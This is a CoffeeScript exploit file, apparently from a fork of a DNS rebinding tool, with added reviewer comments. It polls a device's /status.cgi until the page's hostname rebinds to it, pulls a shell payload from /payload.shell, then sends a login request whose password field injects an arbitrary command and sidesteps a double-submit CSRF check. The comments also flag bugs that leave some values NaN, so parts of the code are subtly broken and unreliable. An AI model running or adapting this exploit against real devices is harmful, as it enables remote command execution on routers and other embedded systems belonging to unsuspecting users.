forked from taviso/rbndr
exploit.coffee
# ajax(url, params, hdrs): blocking GET helper built on XMLHttpRequest.
#
#   url    - request path or URL.
#   params - optional object of query parameters; encoded with URLSearchParams
#            and appended to `url` after a `?`.
#   hdrs   - optional object of extra request headers, applied after the two
#            fixed headers below.
#
# Returns the response body when the status is exactly 200. Returns null for
# any other status, or when anything inside the try block throws.
ajax = (url, params, hdrs) ->
  try
    xhr = new XMLHttpRequest
    query = new URLSearchParams
    if params
      query.append key, val for [key, val] in Object.entries params
      # NOTE(review): the listing lost its indentation; this line is assumed to
      # sit inside the `if params` branch -- confirm against the original file.
      url += "?#{query.toString()}"
    # Third argument falsy => synchronous request: send() blocks until done.
    xhr.open 'GET', url, 0
    xhr.setRequestHeader 'X-Requested-With', 'XMLHttpRequest'
    xhr.setRequestHeader 'Content-type', 'application/x-www-form-urlencoded'
    if hdrs
      xhr.setRequestHeader key, val for [key, val] in Object.entries hdrs
    xhr.send()
    if xhr.status is 200 then xhr.responseText else null
  catch
    null
# random_string(len): return `len` characters drawn from [a-zA-Z0-9].
# Built on Math.random, so the output is not cryptographically unpredictable;
# in this file it only fills throw-away request parameters.
random_string = (len) ->
  alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' + '0123456789'
  # charAt truncates the fractional index, giving a position in the alphabet.
  picks = (alphabet.charAt(Math.random() * alphabet.length) for n in [0...len])
  picks.join ''
# exploit(cmd, token): send one GET to /status.cgi on the current origin with
# `cmd` embedded in the `password` query parameter.
#
#   cmd   - string placed between `'; ` and ` ; #` in the password value.
#   token - value sent in the X-XSRF-TOKEN request header.
#
# Returns whatever ajax() returns (response text on HTTP 200, otherwise null).
#
# NOTE(review): the quote / semicolon / `#` wrapper around `cmd` only makes
# sense if the server-side login_confirm handler places the password inside a
# shell command line -- presumably an OS command injection; the handler is not
# shown here, so confirm against the device firmware.
# Defensive takeaways: the handler should not pass request fields to a shell,
# and requests to /status.cgi whose `password` contains `';` or whose `_`
# contains `pytester` are a usable detection signature for this script.
exploit = (cmd, token) ->
  params = {
    # Timestamp + fixed marker + random suffix.
    '_': "#{Math.round (new Date).getTime() / 1000}pytester#{random_string 12}",
    'sessionKey': 'NULL',
    'cmd': '3',
    'nvget': 'login_confirm',
    'username': random_string(4),
    # Closes a quoted string, runs `cmd`, then comments out the remainder.
    'password': "'; #{cmd} ; #"
  }
  hdrs = {
    'X-XSRF-TOKEN': token,
    'DNT': '1',
    # NOTE(review): browsers list Cookie as a forbidden request-header name,
    # so this entry is expected to be ignored and cookies attached by the
    # browser itself -- confirm for the target browser.
    'Cookie': document.cookie
  }
  ajax '/status.cgi', params, hdrs
# isthisyou(): probe /status.cgi on the current origin.
# Returns ajax()'s result: the response text on HTTP 200 (an empty body is
# still falsy to callers), otherwise null.
# NOTE(review): presumably this tells the page whether its hostname now
# resolves to the target device (the file lives in a fork of rbndr, a DNS
# rebinding tool) -- confirm.
# NOTE(review): `Date.getTime` is read from the Date constructor without being
# called, so the leading number in `_` renders as `NaN` as written.
isthisyou = ->
  stamp = Math.round Date.getTime / 1000
  probe =
    '_': "#{stamp}pytester#{random_string 12}"
  ajax '/status.cgi', probe
# Payload: holder for the text fetched from /payload.shell.
# NOTE(review): set / hasnot / get are written as assignments inside the class
# body; confirm how they are exposed on instances, since the top-level code
# calls them as mp.set(), mp.hasnot() and mp.get().
class @Payload
  # Fetch /payload.shell into this.code, but only while the /status.cgi probe
  # fails (isthisyou() falsy). Always returns undefined.
  set = ->
    this.code = ajax '/payload.shell' if !isthisyou()
    return
  # True while this.code is null or undefined, i.e. nothing has been stored.
  hasnot = ->
    !this.code?
  # Return the stored payload text.
  get = ->
    this.code
# Top-level driver, run when the script loads.
# Step 1: keep calling mp.set() until a payload has been stored.
mp = new Payload
mp.set() while mp.hasnot()
# Step 2: pick a token and store it as the XSRF-TOKEN cookie for this
# hostname; exploit() sends the same value in the X-XSRF-TOKEN header.
# NOTE(review): `Math.random` is referenced without being called, so the
# product -- and the cookie value -- is NaN as written.
# NOTE(review): cookie + matching header looks like the double-submit CSRF
# pattern. A script served under the same hostname can set both halves itself,
# so that check does not stop a DNS-rebinding page; the device would need to
# validate the Host header of incoming requests -- confirm against the target.
token = Math.round Math.random * 100000000000
document.cookie = "XSRF-TOKEN=#{token}"
# Step 3: poll /status.cgi with synchronous requests (this blocks the tab)
# until the probe succeeds, then send the crafted login request once.
# NOTE(review): indentation was lost in this listing; `break` is assumed to
# sit inside the `if` -- confirm against the original file.
while true
  if isthisyou()
    exploit mp.get(), token
    break